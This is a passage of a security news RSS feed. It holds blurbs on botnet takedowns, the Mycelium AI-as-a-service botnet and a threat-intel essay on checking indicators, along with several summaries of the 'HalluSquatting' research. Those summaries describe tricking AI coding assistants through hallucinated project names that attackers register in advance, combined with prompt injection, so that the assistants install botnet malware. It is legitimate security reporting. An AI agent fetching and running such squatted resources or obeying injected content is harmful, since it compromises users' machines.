We eventually found a promising project on Framasoft's forge Framagit called reaction written by ppom... After we ran into scaling issues with our initial implementation, we developed a much faster implementation where the reaction shutdown process would export the IP sets to disk and the reaction startup process would restore the IP sets. This allowed us to have nearly instantaneous restarts of the service to apply new rules. We published both of our configurations upstream to reaction's wiki so that everyone can benefit from it. reaction's getting started documentation now leads to the method that we proposed... 


Many sysadmins know about fail2ban, but not enough people know about reaction. I am very grateful to ppom for the help they have provided and for the tremendous project they have released to the world with reaction. We have implemented other defenses as well, but reaction is doing the majority of the automated work keeping our sites online.

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=How+the+FSF+Sysadmins+are+Blocking+Botnets+with+reaction+%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F11%2F0450256%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F11%2F0450256%2Fhow-the-fsf-sysadmins-are-blocking-botnets-with-reaction%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/11/0450256/how-the-fsf-sysadmins-are-blocking-botnets-with-reaction?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Australian telecom outage attributed to software bug.]]></title>
<description><![CDATA[FBI disrupts residential proxy network used by botnet. Zimbra patches a critical flaw in its Classic Web Client.]]></description>
<link>https://tsecurity.de/de/3661234/it-security-nachrichten/australian-telecom-outage-attributed-to-software-bug/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661234/it-security-nachrichten/australian-telecom-outage-attributed-to-software-bug/</guid>
<pubDate>Sat, 11 Jul 2026 06:19:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FBI disrupts residential proxy network used by botnet. Zimbra patches a critical flaw in its Classic Web Client.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘HalluSquatting’ Turns AI Hallucinations Into Botnet Delivery Mechanism]]></title>
<description><![CDATA[Researchers demonstrate adversarial hallucination squatting against popular AI assistants to achieve remote code execution. The post ‘HalluSquatting’ Turns AI Hallucinations Into Botnet Delivery Mechanism appeared first on SecurityWeek. This article has been indexed from SecurityWeek Read the ori...]]></description>
<link>https://tsecurity.de/de/3659192/it-security-nachrichten/hallusquatting-turns-ai-hallucinations-into-botnet-delivery-mechanism/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659192/it-security-nachrichten/hallusquatting-turns-ai-hallucinations-into-botnet-delivery-mechanism/</guid>
<pubDate>Fri, 10 Jul 2026 11:07:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Researchers demonstrate adversarial hallucination squatting against popular AI assistants to achieve remote code execution. The post ‘HalluSquatting’ Turns AI Hallucinations Into Botnet Delivery Mechanism appeared first on SecurityWeek. This article has been indexed from SecurityWeek Read the original article: ‘HalluSquatting’…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hallusquatting-turns-ai-hallucinations-into-botnet-delivery-mechanism/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hallusquatting-turns-ai-hallucinations-into-botnet-delivery-mechanism/">‘HalluSquatting’ Turns AI Hallucinations Into Botnet Delivery Mechanism</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘HalluSquatting’ Turns AI Hallucinations Into Botnet Delivery Mechanism]]></title>
<description><![CDATA[Researchers demonstrate adversarial hallucination squatting against popular AI assistants to achieve remote code execution.
The post ‘HalluSquatting’ Turns AI Hallucinations Into Botnet Delivery Mechanism appeared first on SecurityWeek.]]></description>
<link>https://tsecurity.de/de/3659101/it-security-nachrichten/hallusquatting-turns-ai-hallucinations-into-botnet-delivery-mechanism/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659101/it-security-nachrichten/hallusquatting-turns-ai-hallucinations-into-botnet-delivery-mechanism/</guid>
<pubDate>Fri, 10 Jul 2026 10:37:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Researchers demonstrate adversarial hallucination squatting against popular AI assistants to achieve remote code execution.</p>
<p>The post <a href="https://www.securityweek.com/hallusquatting-turns-ai-hallucinations-into-botnet-delivery-mechanism/">‘HalluSquatting’ Turns AI Hallucinations Into Botnet Delivery Mechanism</a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New HalluSquatting Attack Allows Hackers to Poison AI Coding Assistants Into Installing Botnet Malware]]></title>
<description><![CDATA[A newly disclosed attack technique dubbed “HalluSquatting” is raising serious concerns in the cybersecurity community after researchers demonstrated how AI coding assistants can be manipulated into installing botnet malware through hallucinated resources. The research, conducted by Aya Spira, Sta...]]></description>
<link>https://tsecurity.de/de/3657041/it-security-nachrichten/new-hallusquatting-attack-allows-hackers-to-poison-ai-coding-assistants-into-installing-botnet-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657041/it-security-nachrichten/new-hallusquatting-attack-allows-hackers-to-poison-ai-coding-assistants-into-installing-botnet-malware/</guid>
<pubDate>Thu, 09 Jul 2026 14:38:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed attack technique dubbed “HalluSquatting” is raising serious concerns in the cybersecurity community after researchers demonstrated how AI coding assistants can be manipulated into installing botnet malware through hallucinated resources. The research, conducted by Aya Spira, Stav Cohen,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-hallusquatting-attack-allows-hackers-to-poison-ai-coding-assistants-into-installing-botnet-malware/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-hallusquatting-attack-allows-hackers-to-poison-ai-coding-assistants-into-installing-botnet-malware/">New HalluSquatting Attack Allows Hackers to Poison AI Coding Assistants Into Installing Botnet Malware</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New HalluSquatting Attack Allows Hackers to Poison AI Coding Assistants Into Installing Botnet Malware]]></title>
<description><![CDATA[A newly disclosed attack technique dubbed “HalluSquatting” is raising serious concerns in the cybersecurity community after researchers demonstrated how AI coding assistants can be manipulated into installing botnet malware through hallucinated resources. The research, conducted by Aya Spira, Sta...]]></description>
<link>https://tsecurity.de/de/3656637/it-security-nachrichten/new-hallusquatting-attack-allows-hackers-to-poison-ai-coding-assistants-into-installing-botnet-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656637/it-security-nachrichten/new-hallusquatting-attack-allows-hackers-to-poison-ai-coding-assistants-into-installing-botnet-malware/</guid>
<pubDate>Thu, 09 Jul 2026 12:23:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed attack technique dubbed “HalluSquatting” is raising serious concerns in the cybersecurity community after researchers demonstrated how AI coding assistants can be manipulated into installing botnet malware through hallucinated resources. The research, conducted by Aya Spira, Stav Cohen, Elad Feldman, Ron Bitton, Avishai Wool, and Ben Nassi from Tel Aviv University, Technion, and […]</p>
<p>The post <a href="https://cybersecuritynews.com/hallusquatting-attack-poison-ai-coding-assistants/">New HalluSquatting Attack Allows Hackers to Poison AI Coding Assistants Into Installing Botnet Malware</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HalluSquatting Attack Lets Hackers Turn AI Coding Assistants Into Botnet Installers]]></title>
<description><![CDATA[A newly disclosed attack technique called “HalluSquatting” is raising serious concerns in the AI security landscape. This technique demonstrates how attackers can exploit large language model (LLM) hallucinations to covertly compromise systems and potentially create botnets on a large scale. The ...]]></description>
<link>https://tsecurity.de/de/3656525/it-security-nachrichten/hallusquatting-attack-lets-hackers-turn-ai-coding-assistants-into-botnet-installers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656525/it-security-nachrichten/hallusquatting-attack-lets-hackers-turn-ai-coding-assistants-into-botnet-installers/</guid>
<pubDate>Thu, 09 Jul 2026 11:38:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed attack technique called “HalluSquatting” is raising serious concerns in the AI security landscape. This technique demonstrates how attackers can exploit large language model (LLM) hallucinations to covertly compromise systems and potentially create botnets on a large scale. The research introduces “adversarial hallucination squatting,” a novel method that exploits AI models that generate […]</p>
<p>The post <a href="https://gbhackers.com/hallusquatting-attack/">HalluSquatting Attack Lets Hackers Turn AI Coding Assistants Into Botnet Installers</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HalluSquatting Attack Lets Hackers Turn AI Coding Assistants Into Botnet Installers]]></title>
<description><![CDATA[A newly disclosed attack technique called “HalluSquatting” is raising serious concerns in the AI security landscape. This technique demonstrates how attackers can exploit large language model (LLM) hallucinations to covertly compromise systems and potentially create botnets on a large scale.…
Rea...]]></description>
<link>https://tsecurity.de/de/3656519/it-security-nachrichten/hallusquatting-attack-lets-hackers-turn-ai-coding-assistants-into-botnet-installers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656519/it-security-nachrichten/hallusquatting-attack-lets-hackers-turn-ai-coding-assistants-into-botnet-installers/</guid>
<pubDate>Thu, 09 Jul 2026 11:38:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed attack technique called “HalluSquatting” is raising serious concerns in the AI security landscape. This technique demonstrates how attackers can exploit large language model (LLM) hallucinations to covertly compromise systems and potentially create botnets on a large scale.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hallusquatting-attack-lets-hackers-turn-ai-coding-assistants-into-botnet-installers/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hallusquatting-attack-lets-hackers-turn-ai-coding-assistants-into-botnet-installers/">HalluSquatting Attack Lets Hackers Turn AI Coding Assistants Into Botnet Installers</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic Botnets Attack Uses HalluSquatting to Hijack AI Coding Assistants]]></title>
<description><![CDATA[A newly disclosed attack technique, called adversarial hallucination squatting (HalluSquatting), developed by researchers at Tel Aviv University and Technion, exploits the predictable tendency of large language models to hallucinate resource identifiers. According to Google, enabling attackers to...]]></description>
<link>https://tsecurity.de/de/3656063/it-security-nachrichten/agentic-botnets-attack-uses-hallusquatting-to-hijack-ai-coding-assistants/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656063/it-security-nachrichten/agentic-botnets-attack-uses-hallusquatting-to-hijack-ai-coding-assistants/</guid>
<pubDate>Thu, 09 Jul 2026 07:38:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly disclosed attack technique, called adversarial hallucination squatting (HalluSquatting), developed by researchers at Tel Aviv University and Technion, exploits the predictable tendency of large language models to hallucinate resource identifiers. According to Google, enabling attackers to hijack popular AI coding assistants at scale and assemble them into a botnet. HalluSquatting works by having attackers […]</p>
<p>The post <a href="https://cyberpress.org/agentic-botnets-hallusquatting-ai-coding/">Agentic Botnets Attack Uses HalluSquatting to Hijack AI Coding Assistants</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New HalluSquatting Attack Could Trick AI Coding Assistants Into Installing Botnet Malware]]></title>
<description><![CDATA[AI coding assistants have a habit of making things up. Ask one to fetch a popular tool, and it will sometimes hand back a real-sounding name for a project that does not exist. New research, which its authors call HalluSquatting, turns…
Read more →
The post New HalluSquatting Attack Could Trick AI...]]></description>
<link>https://tsecurity.de/de/3655207/it-security-nachrichten/new-hallusquatting-attack-could-trick-ai-coding-assistants-into-installing-botnet-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655207/it-security-nachrichten/new-hallusquatting-attack-could-trick-ai-coding-assistants-into-installing-botnet-malware/</guid>
<pubDate>Wed, 08 Jul 2026 20:38:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AI coding assistants have a habit of making things up. Ask one to fetch a popular tool, and it will sometimes hand back a real-sounding name for a project that does not exist. New research, which its authors call HalluSquatting, turns…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-hallusquatting-attack-could-trick-ai-coding-assistants-into-installing-botnet-malware/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-hallusquatting-attack-could-trick-ai-coding-assistants-into-installing-botnet-malware/">New HalluSquatting Attack Could Trick AI Coding Assistants Into Installing Botnet Malware</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HalluSquatting: KI-Coding-Assistenten bauen Botnetze über Halluzinations-Fallen]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – KI-Coding-Assistenten können beim „Fetchen und Ausführen“ durch halluzinierte Projektnamen getäuscht werden. Forschende beschreiben eine Angriffsmethode namens HalluSquatting, bei der eine KI über ihre eigene Eingebauten-Tools in einen Hinterhalt gerät. Entscheidend ist die...]]></description>
<link>https://tsecurity.de/de/3655159/it-security-nachrichten/hallusquatting-ki-coding-assistenten-bauen-botnetze-ueber-halluzinations-fallen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655159/it-security-nachrichten/hallusquatting-ki-coding-assistenten-bauen-botnetze-ueber-halluzinations-fallen/</guid>
<pubDate>Wed, 08 Jul 2026 20:23:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-halluquatting-botnet-agent.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-halluquatting-botnet-agent.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-halluquatting-botnet-agent-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-halluquatting-botnet-agent-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-halluquatting-botnet-agent-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-halluquatting-botnet-agent-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-halluquatting-botnet-agent-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – KI-Coding-Assistenten können beim „Fetchen und Ausführen“ durch halluzinierte Projektnamen getäuscht werden. Forschende beschreiben eine Angriffsmethode namens HalluSquatting, bei der eine KI über ihre eigene Eingebauten-Tools in einen Hinterhalt gerät. Entscheidend ist die Kombination aus vorhersehbarer Namenshalluzination, getarnter Registrierung in Repositories oder Plugin-Stores und Prompt-Injection über extern abgerufenen Content. In Tests führte […]</p>
<div><a href="https://www.it-boltwise.de/hallusquatting-ki-coding-assistenten-bauen-botnetze-ueber-halluzinations-fallen.html">... den vollständigen Artikel <strong>»HalluSquatting: KI-Coding-Assistenten bauen Botnetze über Halluzinations-Fallen«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/hallusquatting-ki-coding-assistenten-bauen-botnetze-ueber-halluzinations-fallen.html">HalluSquatting: KI-Coding-Assistenten bauen Botnetze über Halluzinations-Fallen</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New HalluSquatting Attack Could Trick AI Coding Assistants Into Installing Botnet Malware]]></title>
<description><![CDATA[AI coding assistants have a habit of making things up. Ask one to fetch a popular tool, and it will sometimes hand back a real-sounding name for a project that does not exist.

New research, which its authors call HalluSquatting, turns that habit into an attack: work out the fake names an AI reli...]]></description>
<link>https://tsecurity.de/de/3654883/it-security-nachrichten/new-hallusquatting-attack-could-trick-ai-coding-assistants-into-installing-botnet-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654883/it-security-nachrichten/new-hallusquatting-attack-could-trick-ai-coding-assistants-into-installing-botnet-malware/</guid>
<pubDate>Wed, 08 Jul 2026 18:27:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI coding assistants have a habit of making things up. Ask one to fetch a popular tool, and it will sometimes hand back a real-sounding name for a project that does not exist.

New research, which its authors call HalluSquatting, turns that habit into an attack: work out the fake names an AI reliably invents, register them first, and wait for the assistant to fetch your trap on a user's]]></content:encoded>
</item>
<item>
<title><![CDATA[Mycelium Framework – First-Ever Know Botnet as an AI-as-a-Service]]></title>
<description><![CDATA[A new cybercrime advertisement is turning heads in the security community, and for good reason. It describes a botnet that does not just infect computers, it turns them into rented artificial intelligence power for other criminals to use. The framework, called Mycelium, is sold on an underground ...]]></description>
<link>https://tsecurity.de/de/3654506/it-security-nachrichten/mycelium-framework-first-ever-know-botnet-as-an-ai-as-a-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654506/it-security-nachrichten/mycelium-framework-first-ever-know-botnet-as-an-ai-as-a-service/</guid>
<pubDate>Wed, 08 Jul 2026 15:53:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new cybercrime advertisement is turning heads in the security community, and for good reason. It describes a botnet that does not just infect computers, it turns them into rented artificial intelligence power for other criminals to use. The framework, called Mycelium, is sold on an underground forum as a package for breaking into machines […]</p>
<p>The post <a href="https://cybersecuritynews.com/mycelium-framework-first-ever-know-botnet/">Mycelium Framework – First-Ever Know Botnet as an AI-as-a-Service</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI-as-a-Service Botnet Routes Malicious Workloads Across Compromised Windows and Linux Hosts]]></title>
<description><![CDATA[The underground advertisement for the so-called Mycelium Framework reads like another feature‑packed botnet sales pitch: cross‑platform payloads, encrypted C2, persistence, exploit modules, credential theft, and lateral movement. Those building blocks are not new. What makes Mycelium notable is i...]]></description>
<link>https://tsecurity.de/de/3653881/it-security-nachrichten/ai-as-a-service-botnet-routes-malicious-workloads-across-compromised-windows-and-linux-hosts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653881/it-security-nachrichten/ai-as-a-service-botnet-routes-malicious-workloads-across-compromised-windows-and-linux-hosts/</guid>
<pubDate>Wed, 08 Jul 2026 11:52:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The underground advertisement for the so-called Mycelium Framework reads like another feature‑packed botnet sales pitch: cross‑platform payloads, encrypted C2, persistence, exploit modules, credential theft, and lateral movement. Those building blocks are not new. What makes Mycelium notable is its advertised purpose to treat compromised endpoints not as disposable bots but as a capability‑aware. AI compute […]</p>
<p>The post <a href="https://gbhackers.com/ai-as-a-service-botnet/">AI-as-a-Service Botnet Routes Malicious Workloads Across Compromised Windows and Linux Hosts</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mycelium Botnet Uses Stolen AI API Keys and Local LLMs for Distributed AI Inference]]></title>
<description><![CDATA[A novel underground advertisement has surfaced, showcasing a highly sophisticated framework that transcends traditional operations by repurposing compromised infrastructure into a malicious computational cluster. Flare said in a report shared with Cyber Security News (CSN) that the Mycelium Frame...]]></description>
<link>https://tsecurity.de/de/3653840/it-security-nachrichten/mycelium-botnet-uses-stolen-ai-api-keys-and-local-llms-for-distributed-ai-inference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653840/it-security-nachrichten/mycelium-botnet-uses-stolen-ai-api-keys-and-local-llms-for-distributed-ai-inference/</guid>
<pubDate>Wed, 08 Jul 2026 11:37:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A novel underground advertisement has surfaced, showcasing a highly sophisticated framework that transcends traditional operations by repurposing compromised infrastructure into a malicious computational cluster. Flare said in a report shared with Cyber Security News (CSN) that the Mycelium Framework represents a paradigm shift from conventional monetization toward an advanced AI-as-a-Service model. At first glance, the […]</p>
<p>The post <a href="https://cyberpress.org/mycelium-powers-distributed-ai/">Mycelium Botnet Uses Stolen AI API Keys and Local LLMs for Distributed AI Inference</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[My threat feed told me it was ‘Chalubo.’ The binary disagreed]]></title>
<description><![CDATA[I’ve spent two years doing incident response and threat intel, and the one habit I’d keep if I had to give up every other is also the most boring. I don’t act on a piece of intelligence until I’ve checked it against the thing it claims to describe. It’s slow. It’s tedious. Almost nobody does it, ...]]></description>
<link>https://tsecurity.de/de/3653754/it-security-nachrichten/my-threat-feed-told-me-it-was-chalubo-the-binary-disagreed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653754/it-security-nachrichten/my-threat-feed-told-me-it-was-chalubo-the-binary-disagreed/</guid>
<pubDate>Wed, 08 Jul 2026 11:09:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I’ve spent two years doing incident response and threat intel, and the one habit I’d keep if I had to give up every other is also the most boring. I don’t act on a piece of intelligence until I’ve checked it against the thing it claims to describe. It’s slow. It’s tedious. Almost nobody does it, because checking costs the exact time the feed was supposed to save. So, we read the report, nod and move on. That works fine most weeks. The weeks it doesn’t are the ones I remember, and the one I keep coming back to started with a feed that sounded completely sure of itself and had it backwards.</p>



<h2 class="wp-block-heading">A cluster the feed got wrong</h2>



<p>I was mapping infrastructure behind a loader operation, sweeping a single service port through a commercial platform. It handed back a cluster of hosts; all tagged the same thing: Chalubo RAT. The tag didn’t stop me. The metadata did. Every host in the cluster carried one first-seen date, down to the day.</p>



<p>Real infrastructure never looks that clean. Operators stand hosts up a few at a time, over weeks, whenever they get to it. A whole cluster sharing one first-seen date almost always means you’re looking at the day the feed’s pipeline ingested the batch, not the day anyone actually saw those hosts live. So now I had two things I didn’t trust: The family name and the too-perfect date. Easiest way to settle it was to close the feed and go look at the malware.</p>



<p><a href="https://news.sophos.com/en-us/2018/10/22/chalubo-botnet/">Chalubo</a> is a Linux botnet. It brute-forces SSH and throws DDoS traffic. What I had in front of me was a Windows shellcode loader, a DonutLoader variant, the kind of thing that sits at the front of a ransomware intrusion. Different platform, different job. Calling one the other isn’t a near miss. It’s a category error.</p>



<p>So, I detonated it in an isolated lab, captured the traffic, mapped the C2 and pulled the config. It spoke a protocol of its own: Payload delivery on one custom channel, a steganographic beacon on a second, across a ten-host cluster, with a config format that had nothing to do with Chalubo. The reason for the bad tag turned out to be dull. The feed’s rule for that port keyed on the port plus a loose pattern, my loader tripped it and the label propagated across the whole batch with the ingest date stapled on.</p>



<p>This isn’t a knock on the vendor. Fingerprinting malware families across the entire internet is genuinely hard. The damage starts one step later, with whatever the reader does with that tag. Believe it, and you spend the week hardening against a Linux DDoS botnet while a Windows ransomware precursor sits quietly on your network. Wrong threat. Wrong priorities. The feed didn’t just come up empty. It pointed the response in the wrong direction, with total confidence and a familiar logo on it. Nothing about the tag looked wrong. The file was the only thing that said otherwise.</p>



<h2 class="wp-block-heading">The same gap, in a federal advisory</h2>



<p>For a while I filed this as a commercial-feed problem, the tax you pay for buying intel from a vendor cutting corners at scale. Then the same shape turned up in one of the best sources any of us get for free.</p>



<p>Earlier this year I spent some time inside the joint FBI and CISA <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a">advisory</a> on Ghost, or Cring depending on who’s naming it, a ransomware crew that’s hit organizations in seventy-plus countries. Like everyone, I opened the PDF first. Its indicator table is literally headed “MD5 File Hashes”: 14 samples, each pinned to an MD5 and nothing else. MD5’s been broken for years. It’s the whole reason detection moved to SHA-256, and an MD5-only indicator doesn’t drop cleanly into half the tooling defenders actually run.</p>



<p>Then I opened the other copy of the same advisory. It doesn’t only ship as a PDF. There’s a machine-readable STIX bundle too, the format built to feed straight into a TIP or a SIEM. Same advisory, same code, different file. Six of those fourteen samples carried SHA-256 in the STIX, with SHA-1 and fuzzy hashes next to them, none of it in the PDF table. The stronger indicators were in the official release the entire time, sitting in the file almost nobody opens. Read the PDF like most people do, and you walk away with weaker detections than whoever opened the STIX, and nothing tells you there’s a difference.</p>



<p>That same bundle cut the other way too, and this is the part worth slowing down on. Down in its relationships sat a threat-actor object naming APT41, Winnti, Wicked Panda, wired to several of the Ghost indicators. The advisory’s text never says APT41. It goes out of its way to call the attribution “variable over time.” Pull on the thread and it falls apart: No vendor has ever tied Ghost to APT41, and the object looks like automated enrichment, not a human analyst’s call. The STIX isn’t lying to you. The problem is subtler. Feed it into your TIP and you’ve quietly inherited a nation-state attribution nobody actually made. One file was missing good data. The other was carrying data nobody vetted. You only catch either by looking.</p>



<p>And it’s not a one-country quirk. A while later I reversed a Go backdoor, GAMYBEAR, the one UAC-0241 pointed at Ukrainian schools and state bodies, documented in a CERT-UA <a href="https://cert.gov.ua/article/6286219">advisory</a>. Good report. It nailed the behavior. But the actual loader gave up more than fifteen binary-level corrections to what the advisory had: A persistence mechanism attributed to the wrong component, a broken TLS implementation and a handful of indicators that only held once I checked them against the real sample instead of the writeup. That’s the kind of detail that keeps a detection alive after the operator renames the file. Commercial vendor. Federal agency. Foreign CERT. Three sources, all accurate, all carrying something other than the full truth in the copy most people read.</p>



<h2 class="wp-block-heading">What I do differently now</h2>



<p>The lesson wasn’t trust intelligence more or trust it less. It’s narrower than that. An indicator is a claim, and a claim gets checked before you stake a defense on it, most of all when it’s the advisory covering your own organization, because that’s the one whose blind spots quietly become yours. It’s cheap enough to make routine. If I were standing up a detection program next week, three things would be in from day one.</p>



<p>Treat any automated family label as a guess until something specific backs it. A row of identical first-seen dates is a fact about a pipeline, not a record of an attack. When an advisory ships in more than one format, open the machine-readable copy and don’t stop at the PDF, because the structured file tends to hold both the stronger indicators and the unvetted ones, and you want to see both. And for anything that actually matters, run a live sample through your own stack before you call it covered. The gap between an indicator and a detection that fires is exactly where attackers like to live.</p>



<p>I still reach for all three kinds of source every week, and I’ll defend every one of them. They were never the problem. The checking was always the cheap part. Assuming I could skip it was the expensive one. A report is where the work starts. Not where it stops.</p>



<p>The full teardowns behind these three cases are published on GitHub: The <a href="https://github.com/yankywilson/donutcluster-AS138995">DonutLoader protocol analysis</a>, the <a href="https://github.com/yankywilson/ghost-cring-defender-toolkit">Ghost detection content</a> and the <a href="https://github.com/yankywilson/gamybear">GAMYBEAR reversing notes and rule</a>, each in its own repository.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google and the FBI Target Massive Botnet That Quietly Used Home Devices to Mask Cybercrime]]></title>
<description><![CDATA[Millions of low-cost, off-brand Android devices were hijacked to help criminals hide online.]]></description>
<link>https://tsecurity.de/de/3653073/it-nachrichten/google-and-the-fbi-target-massive-botnet-that-quietly-used-home-devices-to-mask-cybercrime/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653073/it-nachrichten/google-and-the-fbi-target-massive-botnet-that-quietly-used-home-devices-to-mask-cybercrime/</guid>
<pubDate>Wed, 08 Jul 2026 04:17:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Millions of low-cost, off-brand Android devices were hijacked to help criminals hide online.]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI disrupts residential proxy network used by botnet.]]></title>
<description><![CDATA[New macOS infostealer poses as a clipboard manager. AdaptHealth discloses data breach affecting patient information.]]></description>
<link>https://tsecurity.de/de/3649331/it-security-nachrichten/fbi-disrupts-residential-proxy-network-used-by-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649331/it-security-nachrichten/fbi-disrupts-residential-proxy-network-used-by-botnet/</guid>
<pubDate>Mon, 06 Jul 2026 18:29:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[New macOS infostealer poses as a clipboard manager. AdaptHealth discloses data breach affecting patient information.]]></content:encoded>
</item>
